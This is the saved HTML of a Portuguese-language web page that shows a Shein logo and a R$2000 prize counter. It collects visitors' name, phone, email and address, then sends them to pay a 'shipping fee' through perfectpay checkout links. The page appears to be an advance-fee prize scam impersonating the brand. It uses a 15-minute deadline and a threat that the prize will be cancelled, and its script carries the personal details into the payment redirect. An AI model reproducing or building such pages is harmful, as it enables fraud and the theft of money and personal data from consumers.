<!DOCTYPE html><html lang="pt-BR"><head>
	<script 
        src="https://cdn.xtracky.com/scripts/utm-handler.js"
        data-token="1daad849-7613-45d8-bdd7-9d525774e089"
        data-click-id-param="click_id">
</script>
<script 
        src="https://cdn.xtracky.com/scripts/utm-handler.js"
        data-token="3e3ea5d0-7313-4a71-a31d-fad295748342"
        data-click-id-param="click_id">
</script>
    <script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "odlde6f5c1");
</script>
    <script defer>
        document.getElementById('ir-pagamento').addEventListener('click', function() {
            var nome = document.getElementById('nome').value.trim();
            var telefone = document.getElementById('numero').value.trim();
            var email = document.getElementById('email').value.trim();

            if (nome === "" || telefone === "" || email === "") {
                alert("Por favor, preencha todos os campos!");
                return;
            }

            localStorage.setItem('nome', nome);
            localStorage.setItem('telefone', telefone);
            localStorage.setItem('email', email);

            var freteSelecionado = document.querySelector('input[name="frete"]:checked');
            if (!freteSelecionado) {
                alert("Por favor, selecione uma opção de frete!");
                return;
            }

            var freteLink = freteSelecionado.closest('.frete-option').getAttribute('data-link');
            var linkComParametros = freteLink + "?nome=" + encodeURIComponent(nome) + "&telefone=" + encodeURIComponent(telefone) + "&email=" + encodeURIComponent(email);
            window.location.href = linkComParametros;
        });

        window.onload = function() {
            var nome = localStorage.getItem('nome');
            var telefone = localStorage.getItem('telefone');
            var email = localStorage.getItem('email');
            
            if (nome) document.getElementById('nome').value = nome;
            if (telefone) document.getElementById('numero').value = telefone;
            if (email) document.getElementById('email').value = email;
        };
    </script>
	<meta charset="UTF-8">
		<title>D158-SH-8 – atendimentopromo.online</title>
<meta name="robots" content="max-image-preview:large">
<link rel="alternate" type="application/rss+xml" title="Feed para atendimentopromo.online »" href="https://atendimentopromo.online/feed/">
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para atendimentopromo.online »" href="https://atendimentopromo.online/comments/feed/">
<script>
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/atendimentopromo.online\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.2"}};
/*! This file is auto-generated */
!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);
</script>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
</style>
<style id="classic-theme-styles-inline-css">
/*! This file is auto-generated */
.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}
</style>
<style id="global-styles-inline-css">
:root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;}
:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}
:root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;}
</style>
<link rel="stylesheet" id="hello-elementor-css" href="css/style.min.css" media="all">
<link rel="stylesheet" id="hello-elementor-theme-style-css" href="css/theme.min.css" media="all">
<link rel="stylesheet" id="hello-elementor-header-footer-css" href="css/header-footer.min.css" media="all">
<link rel="stylesheet" id="elementor-frontend-css" href="css/frontend.min.css" media="all">
<link rel="stylesheet" id="elementor-post-22-css" href="css/post-22.css" media="all">
<link rel="stylesheet" id="elementor-icons-css" href="css/elementor-icons.min.css" media="all">
<link rel="stylesheet" id="swiper-css" href="css/swiper.min.css" media="all">
<link rel="stylesheet" id="e-swiper-css" href="css/e-swiper.min.css" media="all">
<link rel="stylesheet" id="elementor-pro-css" href="css/frontend.min_1.css" media="all">
<link rel="stylesheet" id="elementor-global-css" href="css/global.css" media="all">
<link rel="stylesheet" id="widget-image-css" href="css/widget-image.min.css" media="all">
<link rel="stylesheet" id="widget-heading-css" href="css/widget-heading.min.css" media="all">
<link rel="stylesheet" id="widget-counter-css" href="css/widget-counter.min.css" media="all">
<link rel="stylesheet" id="widget-text-editor-css" href="css/widget-text-editor.min.css" media="all">
<link rel="stylesheet" id="widget-icon-list-css" href="css/widget-icon-list.min.css" media="all">
<link rel="stylesheet" id="elementor-post-98-css" href="css/post-98.css" media="all">
<link rel="stylesheet" id="google-fonts-1-css" href="https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CPoppins%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&amp;display=swap&amp;ver=6.6.2" media="all">
<link rel="stylesheet" id="elementor-icons-shared-0-css" href="css/fontawesome.min.css" media="all">
<link rel="stylesheet" id="elementor-icons-fa-solid-css" href="css/solid.min.css" media="all">
<link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin=""><script src="js/jquery.min.js" id="jquery-core-js"></script>
<script src="js/jquery-migrate.min.js" id="jquery-migrate-js"></script>
<link rel="https://api.w.org/" href="https://atendimentopromo.online/wp-json/"><link rel="alternate" title="JSON" type="application/json" href="https://atendimentopromo.online/wp-json/wp/v2/pages/98"><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://atendimentopromo.online/xmlrpc.php?rsd">
<meta name="generator" content="WordPress 6.6.2">
<link rel="canonical" href="https://atendimentopromo.online/sh-8/">
<link rel="shortlink" href="https://atendimentopromo.online/?p=98">
<link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://atendimentopromo.online/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fatendimentopromo.online%2Fsh-8%2F">
<link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://atendimentopromo.online/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fatendimentopromo.online%2Fsh-8%2F&amp;format=xml">
<meta name="generator" content="Elementor 3.24.6; features: additional_custom_breakpoints; settings: css_print_method-external, google_font-enabled, font_display-swap">
			<style>
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload),
				.e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * {
					background-image: none !important;
				}
				@media screen and (max-height: 1024px) {
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
				@media screen and (max-height: 640px) {
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload),
					.e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * {
						background-image: none !important;
					}
				}
			</style>
			<link rel="icon" href="images/cropped-fivecon-32x32.png" sizes="32x32">
<link rel="icon" href="images/cropped-fivecon-192x192.png" sizes="192x192">
<link rel="apple-touch-icon" href="images/cropped-fivecon-180x180.png">
<meta name="msapplication-TileImage" content="https://atendimentopromo.online/wp-content/uploads/2024/10/cropped-fivecon-270x270.png">
	<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover"><script src="js/wp-emoji-release.min.js" defer=""></script></head>
<body class="page-template page-template-elementor_canvas page page-id-98 elementor-default elementor-template-canvas elementor-kit-22 elementor-page elementor-page-98">
			<div data-elementor-type="wp-page" data-elementor-id="98" class="elementor elementor-98">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-479300e0 elementor-section-full_width elementor-section-height-default elementor-section-height-default" data-id="479300e0" data-element_type="section" data-settings="{" background_background":"gradient"}"="">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-7e3c8461" data-id="7e3c8461" data-element_type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-1a7d8579 elementor-widget elementor-widget-image" data-id="1a7d8579" data-element_type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
													<img fetchpriority="high" decoding="async" width="600" height="206" src="images/Shein-logo3.png" class="attachment-large size-large wp-image-23" alt="" srcset="images/Shein-logo3.png 600w, images/Shein-logo3-300x103.png 300w" sizes="(max-width: 600px) 100vw, 600px">													</div>
				</div>
					</div>
		</div>
				<div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-4866a656" data-id="4866a656" data-element_type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-507f3d7a elementor-widget elementor-widget-heading" data-id="507f3d7a" data-element_type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
			<h2 class="elementor-heading-title elementor-size-default">Acumulado em prêmios:</h2>		</div>
				</div>
				<div class="elementor-element elementor-element-187b883d elementor-widget elementor-widget-counter" data-id="187b883d" data-element_type="widget" data-widget_type="counter.default">
				<div class="elementor-widget-container">
					<div class="elementor-counter">
						<div class="elementor-counter-number-wrapper">
				<span class="elementor-counter-number-prefix">R$</span>
				<span class="elementor-counter-number" data-duration="" data-to-value="2000" data-from-value="2000" data-delimiter=".">2000</span>
				<span class="elementor-counter-number-suffix"></span>
			</div>
		</div>
				</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				<section class="elementor-section elementor-top-section elementor-element elementor-element-5f02a0b7 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5f02a0b7" data-element_type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-15c0428c id1" data-id="15c0428c" data-element_type="column" data-settings="{" background_background":"classic"}"="">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-32e4cebc elementor-widget elementor-widget-html" data-id="32e4cebc" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
			    <style>
        .stepper {
            display: flex;
            align-items: center;
            justify-content: space-around;
            padding: 10px;
            background-color: #f5f5f5;
            border-radius: 8px;
        }

        .step {
            display: flex;
            align-items: center;
            position: relative;
        }

        .circle {
            width: 30px;
            height: 30px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            font-size: 16px;
            font-weight: bold;
            color: white;
        }

        .active {
            background-color: #000;
        }

        .inactive {
            background-color: #f0f0f0;
            color: #888;
        }

        .step-text {
            margin-left: 10px;
            font-size: 16px;
            color: #333;
            font-family: 'Poppins';
        }

        .inactive-text {
            color: #888;
        }
    </style>
<div class="stepper">
    <div class="step">
        <div class="circle active">1</div>
        <div class="step-text">Entrega</div>
    </div>
    <div class="step">
        <div class="circle inactive">2</div>
        <div class="step-text inactive-text">Frete</div>
    </div>
</div>		</div>
				</div>
				<div class="elementor-element elementor-element-4465ec17 elementor-widget elementor-widget-html" data-id="4465ec17" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
			    <div id="id1">
			        <h5>Identificação</h5>
			        <input type="text" id="nome" placeholder="Nome Completo" maxlength="402">
			        <input type="text" id="numero" placeholder="Telefone" maxlength="20">
			        <input type="text" id="email" placeholder="E-mail" maxlength="120">
        <h5>Entrega</h5>
        <input type="text" id="cep" placeholder="Digite seu CEP" maxlength="12">
        <input type="text" id="endereco" placeholder="Endereço" maxlength="120">
        <input type="text" id="complemento" placeholder="Complemento" maxlength="102">
        <input type="text" id="bairro" placeholder="Bairro" maxlength="120">
        <input type="text" id="cidade" placeholder="Cidade" maxlength="120">
        <div class="colunabutton">
            <button id="freteBtn" disabled="">Seguir para o frete</button>
        </div>
    </div>
    <style>
button {
    padding: 10px 20px;
    border: none;
    border-radius: 5px;
    background-color: #888;
    color: white;
    cursor: not-allowed;
}
button:hover {
    background-color: #4b4b4b;
}
button.active {
    background-color: #000;
    cursor: pointer;
}
#id1 {
    background: white;
    padding: 20px;
    box-shadow: 0 0 15px rgba(0, 0, 0, 0.1);
    border-radius: 10px;
}
#cep,
#numero,
#nome,
#email,
#endereco,
#complemento,
#bairro,
#cidade {
    border: 1px solid #ddd;
    border-radius: 8px;
    padding: 8px; /* Adiciona um pequeno espaçamento interno */
    margin-bottom: 10px; /* Adiciona espaço entre os inputs */
    width: 100%; /* Garante que os inputs fiquem alinhados */
    box-sizing: border-box; /* Evita que o padding aumente o tamanho do input */
}

.colunabutton {
    text-align: right;
    padding-top: 20px;
}
    </style>		</div>
				</div>
					</div>
		</div>
				<div class="elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-50a5de5b id2" data-id="50a5de5b" data-element_type="column" data-settings="{" background_background":"classic"}"="">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-66fb6636 elementor-widget elementor-widget-html" data-id="66fb6636" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
			<div class="stepper">
    <div class="step">
        <div class="circle inactive">1</div>
        <div class="step-text inactive-text">Entrega</div>
    </div>
    <div class="step">
        <div class="circle active">2</div>
        <div class="step-text">Frete</div>
    </div>
</div>		</div>
				</div>
				<div class="elementor-element elementor-element-6aae21f0 elementor-widget elementor-widget-html" data-id="6aae21f0" data-element_type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
			    <style>
        .container1 {
            background: white;
            padding: 20px;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.1);
            border-radius: 10px;
        }

        h2 {
            text-align: center;
            margin-bottom: 20px;
        }

        .frete-option {
            border: 1px solid #ddd;
            border-radius: 8px;
            margin-bottom: 10px;
            padding: 10px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            cursor: pointer;
            transition: 0.3s;
        }

        .frete-option:hover, .frete-option.selected {
            border-color: #007bff;
        }

        .frete-option input[type="radio"] {
            margin-right: 10px;
        }

        .frete-option label {
            display: flex;
            flex-direction: column;
        }

        .frete-option .price {
            font-weight: bold;
        }

        .button-container {
            text-align: right;
            margin-top: 20px;
        }

        .button-container button {
            background-color: #000;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            font-size: 16px;
            cursor: pointer;
            transition: 0.3s;
        }

        .button-container button:hover {
            background-color: #00a101;
        }
        .previsao {
            width: 100%;
        }
        h5 {
            margin-top: 0;
            font-family: inherit;
            font-weight: 500;
            line-height: 1.2;
            color: inherit;
            font-size: 1.25rem;
        }
        label {
            font-weight: 400
        }
    </style>



    <div class="container1">
        <h5>Escolha o melhor frete para você</h5>

        <!-- Coloque seu link personalizado no atributo 'data-link' -->
        <div class="frete-option" data-value="frete2" data-link="https://go.perfectpay.com.br/PPU38CPNDJK">
            <input type="radio" id="frete2" name="frete" value="frete2">
            <div class="previsao">
                <label for="frete2">
                <span><b>E-total - Expresso</b></span>
                <span>A previsão de entrega pode variar de acordo com a região (5 dias úteis)</span>
                </label>
            </div>
            <div class="price">R$39,90</div>
        </div>

        <div class="frete-option" data-value="frete3" data-link="https://go.perfectpay.com.br/PPU38CPNH23">
            <input type="radio" id="frete3" name="frete" value="frete3">
            <div class="previsao">
                <label for="frete3">
                <span><b>E-total - Advanced</b></span>
                <span>A previsão de entrega pode variar de acordo com a região (2 - 3 dias úteis)</span>
                </label>
            </div>
            <div class="price">R$49,35</div>
        </div>

        <div class="frete-option" data-value="frete4" data-link="https://go.perfectpay.com.br/PPU38CPNH24">
            <input type="radio" id="frete4" name="frete" value="frete4">
            <div class="previsao">
                <label for="frete4">
                <span><b>FULL - ENTREGA AMANHÃ! - E-total</b></span>
                <span>A previsão de entrega pode variar de acordo com a região (Entrega em até 24 horas)</span>
                </label>
            </div>
            <div class="price">R$54,50</div>
        </div>

        <div class="button-container">
            <button id="ir-pagamento">IR PARA O PAGAMENTO</button>
        </div>
        




    </div>
    


    <script>
        // Seleciona todas as opções de frete
        const freteOptions = document.querySelectorAll('.frete-option');

        // Adiciona o evento de clique em cada opção
        freteOptions.forEach(option => {
            option.addEventListener('click', function() {
                // Remove a classe 'selected' de todas as opções
                freteOptions.forEach(opt => opt.classList.remove('selected'));
                
                // Adiciona a classe 'selected' à opção clicada
                this.classList.add('selected');

                // Marca o radio button correspondente
                this.querySelector('input[type="radio"]').checked = true;
            });
        });

        document.getElementById('ir-pagamento').addEventListener('click', function() {
            const selectedFrete = document.querySelector('input[name="frete"]:checked');
            
            if (selectedFrete) {
                // Obtenha o link diretamente do atributo 'data-link'
                const selectedOption = selectedFrete.closest('.frete-option');
                const link = selectedOption.getAttribute('data-link');
                
                // Redireciona para o link específico
                window.location.href = link + window.location.search;
            } else {
                alert('Selecione um frete antes de continuar!');
            }
        });
    </script>
		</div>
				</div>
				<div class="elementor-element elementor-element-e792fef elementor-widget elementor-widget-text-editor" data-id="e792fef" data-element_type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
							<p style="text-align: center;"><strong>Atenção</strong>:</p><p>Ao seguir adiante você terá o prazo de <strong>15 minutos</strong> para efetuar o pagamento do frete.</p><p>Caso não pague dentro do prazo estabelecido, sua premiação será cancelada e será disponibilizada automaticamente para o próximo participante na fila.</p><p>Esta é uma medida de segurança que fará com que apenas pessoas reais participem deste processo de seleção.</p>						</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				<section class="elementor-section elementor-top-section elementor-element elementor-element-3132dbe8 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3132dbe8" data-element_type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-25823ccb" data-id="25823ccb" data-element_type="column">
